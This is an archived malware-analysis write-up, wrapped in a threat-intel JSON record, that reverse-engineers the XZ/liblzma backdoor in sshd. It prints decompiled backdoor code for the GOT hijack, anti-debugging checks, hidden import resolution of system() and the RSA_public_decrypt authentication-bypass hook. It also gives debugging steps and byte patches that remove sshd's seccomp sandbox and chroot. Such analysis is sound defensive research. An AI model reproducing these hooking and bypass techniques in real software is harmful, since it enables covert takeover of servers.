{
	"id": "5b3ebe51-0b21-4959-b874-993c63e5ac36",
	"created_at": "2026-04-06T00:21:27.652034Z",
	"updated_at": "2026-04-10T13:11:42.17376Z",
	"deleted_at": null,
	"sha1_hash": "bb949a0cab1743c3ae0341a061b03bb40b6c3315",
	"title": "[WIP] XZ Backdoor Analysis and symbol mapping",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 143333,
	"plain_text": "[WIP] XZ Backdoor Analysis and symbol mapping\r\nBy smx-smx\r\nArchived: 2026-04-05 16:56:58 UTC\r\nDiscord Room for discussion\r\nhttps://discord.com/invite/maFYmgQkYH\r\nGithub repository:\r\nhttps://github.com/smx-smx/xzre\r\nInit routines\r\nLlzma_delta_props_decoder -\u003e backdoor_ctx_save\r\nLlzma_block_param_encoder_0 -\u003e backdoor_init\r\nLlzma_delta_props_encoder -\u003e backdoor_init_stage2\r\nPrefix Trie (https://social.hackerspace.pl/@q3k/112184695043115759)\r\nLlzip_decode_1 -\u003e table1\r\nLcrc64_clmul_1 -\u003e table2\r\nLlz_stream_decode -\u003e count_1_bits\r\nLsimple_coder_update_0 -\u003e table_get\r\nRetrieves the index of the encoded string given the plaintext string in memory\r\nLcrc_init_0 -\u003e import_lookup\r\n.Lcrc64_generic.0 -\u003e import_lookup_ex\r\nAnti RE and x64 code Dasm\r\nLlzma_block_buffer_encode_0 -\u003e check_software_breakpoint\r\nLx86_code_part_0 -\u003e code_dasm\r\nLlzma_index_iter_rewind_cold -\u003e check_return_address\r\nhttps://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nPage 1 of 10\n\nChecks if the return address has been tampered with. This function is called at the beginning of a\r\n\"protected\" function. If the check fails, the function returns early without doing anything\r\nLlzma_delta_decoder_init_part_0 -\u003e backdoor_vtbl_init\r\nIt sets up a vtable with core functions used by the backdoor\r\nLstream_decoder_memconfig_part_1 -\u003e get_lzma_allocator\r\nLlzma_simple_props_encode_1 -\u003e j_tls_get_addr\r\nLlzma_block_uncomp_encode_0 -\u003e rodata_ptr_offset\r\nLlzma12_coder_1 -\u003e global_ctx\r\nELF parsing\r\nLlzma_filter_decoder_is_supported.part.0 -\u003e parse_elf_invoke\r\nLmicrolzma_encoder_init_1 -\u003e parse_elf_init\r\nLget_literal_price_part_0 -\u003e parse_elf\r\nLlzma_stream_header_encode_part_0 -\u003e get_ehdr_address\r\nLparse_bcj_0 -\u003e process_elf_seg\r\nLlzma_simple_props_size_part_0 -\u003e is_gnu_relro\r\nStealthy ELF magic verification\r\n // locate elf header\r\n while ( 1 )\r\n {\r\n if ( (unsigned int)table_get(ehdr, 0LL) == STR__ELF ) // 0x300\r\n break; // found\r\n ehdr -= 64; // backtrack and try again\r\n if ( ehdr == start_pointer )\r\n goto not_found;\r\n }\r\nLlzma_stream_flags_compare_1 -\u003e get_rodata_ptr\r\nVerified or Suspected function hooking\r\nhttps://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nPage 2 of 10\n\nLlzma_index_memusage_0 -\u003e apply_entries\r\nLlzma_check_init_part_0 -\u003e apply_one_entry\r\nLrc_read_init_part_0 -\u003e apply_one_entry_internal\r\nLlzma_lzma_optimum_fast_0 -\u003e install_entries\r\nLlzip_decoder_memconfig_part_0 -\u003e installed_func_0\r\nLlzma_index_prealloc_0 -\u003e RSA_public_decrypt GOT hook/detour\r\nLlzma_index_stream_size_1 -\u003e check_special_rsa_key -\u003e (thanks q3k)\r\nCalled from Llzma_index_prealloc_0 , it checks if the supplied RSA key is the special key to\r\nbypass the normal authentication flow\r\nLindex_decode_1 -\u003e installed_func_2\r\nLindex_encode_1 -\u003e installed_func_3\r\nLlzma2_decoder_end_1 -\u003e apply_one_entry_ex\r\nLlzma2_encoder_init.1 -\u003e apply_method_1\r\nLlzma_memlimit_get_1 -\u003e apply_method_2\r\nlzma allocator / call hiding\r\nLstream_decoder_mt_end_0 -\u003e get_lzma_allocator_addr\r\nLinit_pric_table_part_1 -\u003e fake_lzma_allocator\r\nLstream_decode_1 -\u003e fake_lzma_free\r\ncore functionality\r\nLlzma_delta_props_encode_part_0 -\u003e resolve_imports (including system() )\r\nLlzma_index_stream_flags_0 -\u003e process_shared_libraries\r\nReads the list of loaded libraries through _r_debug-\u003er_map , and calls\r\nprocess_shared_libraries_map to traverse it\r\nLlzma_index_encoder_init_1 -\u003e process_shared_libraries_map\r\nTraverses the list of loaded libraries, looking for specific libraries\r\nhttps://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nPage 3 of 10\n\nfunc @0x7620 : It does indirect calls on the vtable configured by backdoor_vtbl_init , and is called by\r\nthe RSA_public_decrypt hook (func#1) upon certain conditions are met\r\nSoftware Breakpoint check, method 1\r\nThis method checks if the instruction endbr64 , which is always present at the beginning of every function in the\r\nmalware, is overwritten. GDB would typically do this when inserting a software breakpoint\r\n/*** address: 0xAB0 ***/\r\n__int64 check_software_breakpoint(_DWORD *code_addr, __int64 a2, int a3)\r\n{\r\n unsigned int v4;\r\n v4 = 0;\r\n // [for a3=0xe230], true when *v = 0xfa1e0ff3 (aka endbr64)\r\n if ( a2 - code_addr \u003e 3 )\r\n return *code_addr + (a3 | 0x5E20000) == 0xF223;// 5E2E230\r\n return v4;\r\n}\r\nFunction backdoor_init (0xA784)\r\n__int64 backdoor_init(rootkit_ctx *ctx, DWORD *prev_got_ptr)\r\n{\r\n _DWORD *v2;\r\n __int64 runtime_offset;\r\n bool is_cpuid_got_zero;\r\n void *cpuid_got_ptr;\r\n __int64 got_value;\r\n _QWORD *cpuid_got_ptr_1;\r\n ctx-\u003eself = ctx;\r\n // store data before overwrite\r\n backdoor_ctx_save(ctx);\r\n ctx-\u003eprev_got_ptr = ctx-\u003egot_ptr;\r\n runtime_offset = ctx-\u003ehead - ctx-\u003eself;\r\n ctx-\u003eruntime_offset = runtime_offset;\r\n is_cpuid_got_zero = (char *)*(\u0026Llzma_block_buffer_decode_0 + 1) + runtime_offset == 0LL;\r\n cpuid_got_ptr = (char *)*(\u0026Llzma_block_buffer_decode_0 + 1) + runtime_offset;\r\n ctx-\u003egot_ptr = cpuid_got_ptr;\r\n if ( !is_cpuid_got_zero )\r\n {\r\n cpuid_got_ptr_1 = cpuid_got_ptr;\r\n got_value = *(QWORD *)cpuid_got_ptr;\r\n // replace with Llzma_delta_props_encoder (backdoor_init_stage2)\r\nhttps://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nPage 4 of 10\n\n*(QWORD *)cpuid_got_ptr = (char *)*(\u0026Llzma_block_buffer_decode_0 + 2) + runtime_offset;\r\n // this calls Llzma_delta_props_encoder due to the GOT overwrite\r\n runtime_offset = cpuid((unsigned int)ctx, prev_got_ptr, cpuid_got_ptr, \u0026Llzma_block_buffer_decode\r\n // restore original\r\n *cpuid_got_ptr_1 = got_value;\r\n }\r\n return runtime_offset;\r\n}\r\nFunction Name matching (function 0x28C0)\r\nstr_id = table_get(a6, 0LL);\r\n...\r\nif ( str_id == STR_RSA_public_decrypt_ \u0026\u0026 v11 )\r\n...\r\nelse if ( v13 \u0026\u0026 str_id == STR_EVP_PKEY_set__RSA_ )\r\n...\r\nelse if (str_id != STR_RSA_get__key_ || !v17 )\r\nHidden calls (via lzma_alloc )\r\nlzma_alloc has the following prototype:\r\nextern void * lzma_alloc (size_t size , const lzma_allocator * allocator )\r\nThe malware implements a custom allocator, which is obtained from get_lzma_allocator @ 0x4050\r\nvoid *get_lzma_allocator()\r\n{\r\n return get_lzma_allocator_addr() + 8;\r\n}\r\nchar *get_lzma_allocator_addr()\r\n{\r\n unsigned int i;\r\n char *mem;\r\n // Llookup_filter_part_0 holds the relative offset of `_Ldecoder_1` - 180h (0xC930)\r\n // by adding 0x180, it gets to 0xCAB0 (Lx86_coder_destroy), Since the caller adds +8, we get to 0xC\r\n mem = (char *)Llookup_filter_part_0;\r\n for ( i = 0; i \u003c= 0xB; ++i )\r\n mem += 32;\r\nhttps://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nPage 5 of 10\n\nreturn mem;\r\n}\r\nThe interface for lzma_allocator can be viewed for example here:\r\nhttps://github.com/frida/xz/blob/e70f5800ab5001c9509d374dbf3e7e6b866c43fe/src/liblzma/api/lzma/base.h#L378-\r\nL440\r\nTherefore, the allocator is Linit_pric_table_part_1 and free is Lstream_decode_1\r\nNOTE: the function used for alloc is very likely import_lookup_ex , which turns lzma_alloc into an\r\nimport resolution function. this is used a lot in resolve_imports , e.g.:\r\n system_func = lzma_alloc(STR_system_, lzma_allocator);\r\n ctx-\u003esystem = system_func;\r\n if ( system_func )\r\n ++ctx-\u003enum_imports;\r\n shutdown_func = lzma_alloc(STR_shutdown_, lzma_allocator);\r\n ctx-\u003eshutdown = shutdown_func;\r\n if ( shutdown_func )\r\n ++ctx-\u003enum_imports;\r\nThe third lzma_allocator field, opaque , is abused to pass information about the loaded ELF file to the \"fake\r\nallocator\" function. This is highlighted quite well by function Llzma_index_buffer_encode_0 :\r\n__int64 Llzma_index_buffer_encode_0(Elf64_Ehdr **p_elf, struct_elf_info *elf_info, struct_ctx *ctx)\r\n{\r\n _QWORD *lzma_allocator;\r\n __int64 result;\r\n __int64 fn_read;\r\n __int64 fn_errno_location;\r\n lzma_allocator = get_lzma_allocator();\r\n result = parse_elf(*p_elf, elf_info); // reads elf into elf_info\r\n if ( (_DWORD)result )\r\n {\r\n lzma_allocator[2] = elf_info; // set opaque field to the parsed elf info\r\n fn_read = lzma_alloc(STR_read_, lzma_allocator);\r\n ctx-\u003efn_read = fn_read;\r\n if ( fn_read )\r\n ++ctx-\u003enum_imports;\r\n fn_errno_location = lzma_alloc(STR___errno_location_, lzma_allocator);\r\n ctx-\u003efn_errno_location = fn_errno_location;\r\n if ( fn_errno_location )\r\n ++ctx-\u003enum_imports;\r\n return ctx-\u003enum_imports == 2; // true if we found both imports\r\n }\r\nhttps://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nPage 6 of 10\n\nreturn result;\r\n}\r\nNote how, instead of size , the malware passes an EncodedStringID instead\r\nDynamic analysis\r\nAnalyzing the initialization routine\r\n1. Replace the endbr64 in get_cpuid with a jmp . (\"\\xeb\\xfe\")\r\nroot@debian:~# cat /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1 \u003e liblzma.so.5.6.1\r\nroot@debian:~# perl -pe 's/\\xF3\\x0F\\x1E\\xFA\\x55\\x48\\x89\\xF5\\x4C\\x89\\xCE/\\xEB\\xFE\\x90\\x90\\x55\\x48\\x89\\\r\n2. Force sshd to use the modified library with LD_PRELOAD\r\n# env -i LC_LANG=C LD_PRELOAD=$PWD/liblzma.so.5.6.1 /usr/sbin/sshd -h\r\nNOTE: anarazel recommends using LD_LIBRARY_PATH with a symlink instead, since LD_PRELOAD changes the\r\ninitialization order and could interfere with the normal flow of the malware\r\n2b. or use this gdbinit file to do it all at once\r\n# cat gdbinit\r\nset confirm off\r\nunset env\r\n## comment this out if you don't want to debug the initialization code\r\n## (or use LD_LIBRARY_PATH instead)\r\nset env LD_PRELOAD=/root/sshd/liblzma.so.5.6.1\r\nset env LANG=C\r\nfile /usr/sbin/sshd\r\n## start sshd on port 2022\r\nset args -p 2022\r\nset disassembly-flavor intel\r\nset confirm on\r\nset startup-with-shell off\r\nshow env\r\nshow args\r\n# gdb -x gdbinit\r\n(gdb) r\r\nStarting program: /usr/sbin/sshd -p 222\r\n^C \u003c-- send CTRL-C\r\nhttps://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nPage 7 of 10\n\nProgram received signal SIGINT, Interrupt.\r\n0x00007ffff7f8a7f0 in ?? ()\r\n3. Attach to the frozen process with your favourite debugger ( gdb attach pid )\r\n(gdb) bt\r\n#0 0x00007f8cb3b067f0 in ?? () from /root/sshd/liblzma.so.5.6.1\r\n#1 0x00007f8cb3b08c29 in lzma_crc32 () from /root/sshd/liblzma.so.5.6.1\r\n#2 0x00007f8cb3b4ffab in elf_machine_rela (skip_ifunc=\u003coptimized out\u003e,\r\n reloc_addr_arg=0x7f8cb3b3dda0 \u003clzma_crc32@got[plt]\u003e,\r\n version=\u003coptimized out\u003e, sym=0x7f8cb3b03018, reloc=0x7f8cb3b04fc8,\r\n scope=0x7f8cb3b3f4f8, map=0x7f8cb3b3f170)\r\n at ../sysdeps/x86_64/dl-machine.h:300\r\n#3 elf_dynamic_do_Rela (skip_ifunc=\u003coptimized out\u003e, lazy=\u003coptimized out\u003e,\r\n nrelative=\u003coptimized out\u003e, relsize=\u003coptimized out\u003e,\r\n reladdr=\u003coptimized out\u003e, scope=\u003coptimized out\u003e, map=0x7f8cb3b3f170)\r\n at ./elf/do-rel.h:147\r\n#4 _dl_relocate_object (l=l@entry=0x7f8cb3b3f170, scope=\u003coptimized out\u003e,\r\n reloc_mode=\u003coptimized out\u003e, consider_profiling=\u003coptimized out\u003e,\r\n consider_profiling@entry=0) at ./elf/dl-reloc.c:301\r\n#5 0x00007f8cb3b5e6e9 in dl_main (phdr=\u003coptimized out\u003e, phnum=\u003coptimized out\u003e,\r\n user_entry=\u003coptimized out\u003e, auxv=\u003coptimized out\u003e) at ./elf/rtld.c:2318\r\n#6 0x00007f8cb3b5af0f in _dl_sysdep_start (\r\n start_argptr=start_argptr@entry=0x7ffe17e402e0,\r\n dl_main=dl_main@entry=0x7f8cb3b5c900 \u003cdl_main\u003e)\r\n at ../sysdeps/unix/sysv/linux/dl-sysdep.c:140\r\n#7 0x00007f8cb3b5c60c in _dl_start_final (arg=0x7ffe17e402e0)\r\n at ./elf/rtld.c:498\r\n#8 _dl_start (arg=0x7ffe17e402e0) at ./elf/rtld.c:585\r\n#9 0x00007f8cb3b5b4d8 in _start () from /lib64/ld-li\r\nnux-x86-64.so.2\r\n#10 0x0000000000000002 in ?? ()\r\n#11 0x00007ffe17e40fa1 in ?? ()\r\n#12 0x00007ffe17e40fb0 in ?? ()\r\n#13 0x0000000000000000 in ?? ()\r\nNOTE: _get_cpuid will call function 0xA710, whose purpose is to detect if we're at the right point to initialize\r\nthe backdoor Why? Because elf_machine_rela will call _get_cpuid for both lzma_crc32 and lzma_crc64 .\r\nSince the modified code is part of lzma_crc64 , 0xA710 has a simple call counter in it to trace how many times it\r\nhas been called, and make sure the modification doesn't trigger for lzma_crc32 .\r\nfirst call (0): -\u003e lzma_crc32\r\nsecond call (1): -\u003e lzma_crc64\r\nhttps://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nPage 8 of 10\n\nif ( call_counter == 1 )\r\n {\r\n /** NOTE: some of these fields are unverified and guessed **/\r\n rootkit_ctx.head = 1LL;\r\n memset(\u0026rootkit_ctx.runtime_offset, 0, 32);\r\n rootkit_ctx.prev_got_ptr = prev_got_ptr;\r\n backdoor_init(\u0026rootkit_ctx, prev_got_ptr); // replace cpuid got entry\r\n }\r\n ++call_counter;\r\n cpuid(a1, \u0026v5, \u0026v6, \u0026v7, \u0026rootkit_ctx);\r\n return v5;\r\n}\r\nAt this point, you can issue detach and attach with other debuggers if needed.\r\nOnce attached, set relevant breakpoints and restore the original bytes (\"\\xF3\\x0F\\x1E\\xFA\")\r\nbreakpoint on RSA_public_decrypt hook\r\nRun this gdb script on the sshd listener process (this new gdbinit script should account for eventual differences in\r\nlibrary load address - it didn't happen for me in the first tests but it did later on)\r\nset pagination off\r\nset follow-fork-mode child\r\ncatch load\r\n# now we forked, wait for lzma\r\ncatch load liblzma\r\nc\r\n# now we have lzma\r\n# 0x12750: offset from base\r\nhbreak *(lzma_crc32 - 0x2640 + 0x12750)\r\nset disassembly-flavor intel\r\nset pagination on\r\nc\r\nNow connect via https://gist.github.com/keeganryan/a6c22e1045e67c17e88a606dfdf95ae4\r\n...\r\nThread 3.1 \"sshd\" hit Breakpoint 1, 0x00007ffff73d1d00 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5\r\n(gdb) bt\r\n#0 0x00007ffff73d1d00 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5\r\n#1 0x00007ffff73d1ae7 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5 \u003c-- Llzma_index_prealloc_0 (offset 0x48\r\n#2 0x00005555556bdd00 in ?? ()\r\n#3 0x0000000100000004 in ?? ()\r\n#4 0x00007fffffffdeb0 in ?? ()\r\nhttps://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nPage 9 of 10\n\n#5 0x00000001f74b5d7a in ?? ()\r\n#6 0x0000000000000000 in ?? ()\r\nRSA_public_decrypt GOT hook (Llzma_index_prealloc_0)\r\n /** the following happens during pubkey login **/\r\n \r\n params[0] = 1; // should we call original?\r\n // this call checks if the supplied RSA key is special\r\n result = installed_func_1(rsa_key, global_ctx, params);\r\n // if still 1, the payload didn't trigger, call the original function\r\n // if 0, bypass validation\r\n if ( params[0] )\r\n return real_RSA_public_decrypt(flen, from, to, rsa_key);\r\n return result;\r\nBinary patch for sshd to disable seccomp and chroot (allows Frida tracing of [net] processes)\r\n\u003e fc /b sshd sshd_patched\r\nComparing files sshd sshd_patched\r\n0001332A: 75 90\r\n0001332B: 6D 90\r\n----\r\n0004FC24: 41 C3\r\n0004FC25: 54 90\r\n----\r\n00109010: 01 00\r\n0001332A: changes the following JMP to not be taken: https://github.com/openssh/openssh-portable/blob/43e7c1c07cf6aae7f4394ca8ae91a3efc46514e2/sshd.c#L448-L449\r\n0004FC24: changes the ssh_sandbox_child function to be a no-op: https://github.com/openssh/openssh-portable/blob/43e7c1c07cf6aae7f4394ca8ae91a3efc46514e2/sandbox-seccomp-filter.c#L490\r\n00109010: changes the default value of privsep_chroot from 1 to 0 (probably redundant, since it gets\r\noverwritten)\r\nSource: https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nhttps://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504"
	],
	"report_names": [
		"a6112d54777845d389bd7126d6e9f504"
	],
	"threat_actors": [],
	"ts_created_at": 1775434887,
	"ts_updated_at": 1775826702,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bb949a0cab1743c3ae0341a061b03bb40b6c3315.pdf",
		"text": "https://archive.orkl.eu/bb949a0cab1743c3ae0341a061b03bb40b6c3315.txt",
		"img": "https://archive.orkl.eu/bb949a0cab1743c3ae0341a061b03bb40b6c3315.jpg"
	}
}